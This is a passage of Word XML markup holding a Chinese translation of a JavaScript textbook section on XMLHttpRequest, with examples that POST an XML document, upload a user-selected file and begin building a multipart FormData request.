      </w:r>
      <w:r>
        <w:t>请求的主体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-8</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档作为其主体的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>中编码什么东西、在哪儿和半径，然后向指定的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>发送</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当接收到响应时，调用回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function postQuery(url,what,where,radius,callback){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var request=new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.open("POST",url);//</w:t>
      </w:r>
      <w:r>
        <w:t>对指定的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>发送</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.onre</w:t>
      </w:r>
      <w:r>
        <w:t>adystatechange=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>简单的事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(request.readyState===4</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>callback)callback(request);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//Create an XML document with root element</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var doc=document.implementation.createDocument("","query",null);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var query=doc.documentElement;//</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>find=doc.createElement("find");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建＜</w:t>
      </w:r>
      <w:r>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>query.appendChild(find);//</w:t>
      </w:r>
      <w:r>
        <w:t>并把它添加到＜</w:t>
      </w:r>
      <w:r>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t>＞中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>find.setAttribute("zipcode",where);//</w:t>
      </w:r>
      <w:r>
        <w:t>设置＜</w:t>
      </w:r>
      <w:r>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:t>＞的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>find.setAttribute("radius",radius);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>find.appendChild(doc.createTextNode(what));//</w:t>
      </w:r>
      <w:r>
        <w:t>并设置＜</w:t>
      </w:r>
      <w:r>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:t>＞的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>现在向服务器发送</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>编码的数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意将自动设置</w:t>
      </w:r>
      <w:r>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t>头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.send(doc);</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注意：例</w:t>
      </w:r>
      <w:r>
        <w:t>18-8</w:t>
      </w:r>
      <w:r>
        <w:t>不曾为请求设置</w:t>
      </w:r>
      <w:r>
        <w:t>"Content-Type"</w:t>
      </w:r>
      <w:r>
        <w:t>头。当给</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法传入</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档时，并没有预先指定</w:t>
      </w:r>
      <w:r>
        <w:t>"Content-Type"</w:t>
      </w:r>
      <w:r>
        <w:t>头，但</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象会自动设置一个合适的头。（类似地，如果给</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>传入一个字符串但没有指定</w:t>
      </w:r>
      <w:r>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t>头，那么</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>将会添加</w:t>
      </w:r>
      <w:r>
        <w:t>"ext/plain;charset=UTF-8"</w:t>
      </w:r>
      <w:r>
        <w:t>头。）在例</w:t>
      </w:r>
      <w:r>
        <w:t>18-1</w:t>
      </w:r>
      <w:r>
        <w:t>的代码中显式设置了这个头，但实际上对于纯文本的请</w:t>
      </w:r>
      <w:r>
        <w:t>求主体并不需要这么做。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:t>上传文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单的特性之一是当用户通过＜</w:t>
      </w:r>
      <w:r>
        <w:t>input type="file"</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素选择文件时，表单将在它产生的</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求主体中发送文件内容。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单始终能上传文件，但到目前为止它还不能使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest API</w:t>
      </w:r>
      <w:r>
        <w:t>做相同的事情。然后，</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2 API</w:t>
      </w:r>
      <w:r>
        <w:t>允许通过向</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法传入</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象来实现上传文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>没有</w:t>
      </w:r>
      <w:r>
        <w:t>File()</w:t>
      </w:r>
      <w:r>
        <w:t>对象构造函数，脚本仅能获得表示用户当前选择文件的</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象。在支持</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象的浏览器中，每个＜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">input </w:t>
      </w:r>
      <w:r>
        <w:t>type="file"</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素有一个</w:t>
      </w:r>
      <w:r>
        <w:t>files</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它是</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的类数组对象。拖放</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>17.7</w:t>
      </w:r>
      <w:r>
        <w:t>节）允许通过拖放事件的</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer.files</w:t>
      </w:r>
      <w:r>
        <w:t>属性访问用户</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>拖放</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>到元素上的文件。我们将在</w:t>
      </w:r>
      <w:r>
        <w:t>22.6</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>22.7</w:t>
      </w:r>
      <w:r>
        <w:t>节看到更多关于</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象的内容。但现在来讲，可以将它当做一个用户选择文件完全不透明的表示形式，适用于通过</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>来上传文件。例</w:t>
      </w:r>
      <w:r>
        <w:t>18-9</w:t>
      </w:r>
      <w:r>
        <w:t>是一个自然的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数，它对某些文件上传元素添加了</w:t>
      </w:r>
      <w:r>
        <w:t>change</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序，这样它们能自动把任何选择过的文件内容通过</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>方法自</w:t>
      </w:r>
      <w:r>
        <w:t>动发送到指定的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-9</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求上传文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>查找有</w:t>
      </w:r>
      <w:r>
        <w:t>data-uploadto</w:t>
      </w:r>
      <w:r>
        <w:t>属性的全部＜</w:t>
      </w:r>
      <w:r>
        <w:t>input type="file"</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并注册</w:t>
      </w:r>
      <w:r>
        <w:t>onchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这样任何选择的文件都会自动通过</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>方法发送到指定的</w:t>
      </w:r>
      <w:r>
        <w:t>"uploadto"URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>服务器的响应是忽略的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>whenReady(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>当文档准备就绪时运行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var elts=document.getElementsByTagName("input");//</w:t>
      </w:r>
      <w:r>
        <w:t>所有的</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>elts.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历它们</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var input=elts[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(input.type!=="file")continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过所有非文件上传元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var url=input.getAttribute("data-uploadto");//</w:t>
      </w:r>
      <w:r>
        <w:t>获取上传</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!url)continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过任何没有</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>input.addEventListener("change",function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>当用户选择文件时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var file=this</w:t>
      </w:r>
      <w:r>
        <w:t>.files[0];//</w:t>
      </w:r>
      <w:r>
        <w:t>假设单个文件选择</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!file)return;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果没有文件，不做任何事情</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var xhr=new XMLHttpRequest();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建新请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.open("POST",url);//</w:t>
      </w:r>
      <w:r>
        <w:t>向这个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>发送</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.send(file);//</w:t>
      </w:r>
      <w:r>
        <w:t>把文件作为主体发送</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},false);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正如我们在</w:t>
      </w:r>
      <w:r>
        <w:t>22.6</w:t>
      </w:r>
      <w:r>
        <w:t>节所看到的，文件类型是更通用的二进制大对象（</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>）类型中的一个子类型。</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>允许向</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法传入任何</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果没有显式设置</w:t>
      </w:r>
      <w:r>
        <w:t>Cont</w:t>
      </w:r>
      <w:r>
        <w:t>ent-Type</w:t>
      </w:r>
      <w:r>
        <w:t>头，这个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性用于设置待上传的</w:t>
      </w:r>
      <w:r>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t>头。如果需要上传已经产生的二进制数据，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>22.5</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>22.6.3</w:t>
      </w:r>
      <w:r>
        <w:t>节展示的技术把数据转化为</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>并将其作为请求主体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.multipart/form-data</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单同时包含文件上传元素和其他元素时，浏览器不能使用普通的表单编码而必须使用称为</w:t>
      </w:r>
      <w:r>
        <w:t>"multipart/form-data"</w:t>
      </w:r>
      <w:r>
        <w:t>的特殊</w:t>
      </w:r>
      <w:r>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t>来用</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>方法提交表单。这种编码包括使用长</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>边界</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>字符串把请求主体分离成多个部分。对于</w:t>
      </w:r>
      <w:r>
        <w:t>文本数据，手动创建</w:t>
      </w:r>
      <w:r>
        <w:t>"multipart/form-data"</w:t>
      </w:r>
      <w:r>
        <w:t>请求主体是可能的，但很复杂。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>定义了新的</w:t>
      </w:r>
      <w:r>
        <w:t>FormData API</w:t>
      </w:r>
      <w:r>
        <w:t>，它容易实现多部分请求主体。首先，使用</w:t>
      </w:r>
      <w:r>
        <w:t>FormData()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建</w:t>
      </w:r>
      <w:r>
        <w:t>FormData</w:t>
      </w:r>
      <w:r>
        <w:t>对象，然后按需多次调用这个对象的</w:t>
      </w:r>
      <w:r>
        <w:t>append()</w:t>
      </w:r>
      <w:r>
        <w:t>方法把个体</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>部分</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（可以是字符串、</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>对象）添加到请求中。最后，把</w:t>
      </w:r>
      <w:r>
        <w:t>FormData</w:t>
      </w:r>
      <w:r>
        <w:t>对象传递给</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将对请求定义合适的边界字符串和设置</w:t>
      </w:r>
      <w:r>
        <w:t>"Content-Type"</w:t>
      </w:r>
      <w:r>
        <w:t>头。例</w:t>
      </w:r>
      <w:r>
        <w:t>18-10</w:t>
      </w:r>
      <w:r>
        <w:t>演示了</w:t>
      </w:r>
      <w:r>
        <w:t>FormData</w:t>
      </w:r>
      <w:r>
        <w:t>的使用</w:t>
      </w:r>
      <w:r>
        <w:t>，同时我们将在例</w:t>
      </w:r>
      <w:r>
        <w:t>18-11</w:t>
      </w:r>
      <w:r>
        <w:t>再次看到它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-10</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>方法发送</w:t>
      </w:r>
      <w:r>
        <w:t>multipart/form-data</w:t>
      </w:r>
      <w:r>
        <w:t>请求主体</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function postFormData(url,data,callback){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof FormData==="undefined")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw new Error("FormData is not implemented");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var request=new XMLHttpRequest();//</w:t>
      </w:r>
      <w:r>
        <w:t>新</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.open("POST",url);//</w:t>
      </w:r>
      <w:r>
        <w:t>对指定</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>发送</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.onreadystatechange=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>简单的事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(request.readyState===4</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>callback)//</w:t>
      </w:r>
      <w:r>
        <w:t>当响应完成时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>callback(request);//</w:t>
      </w:r>
      <w:r>
        <w:t>调用回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
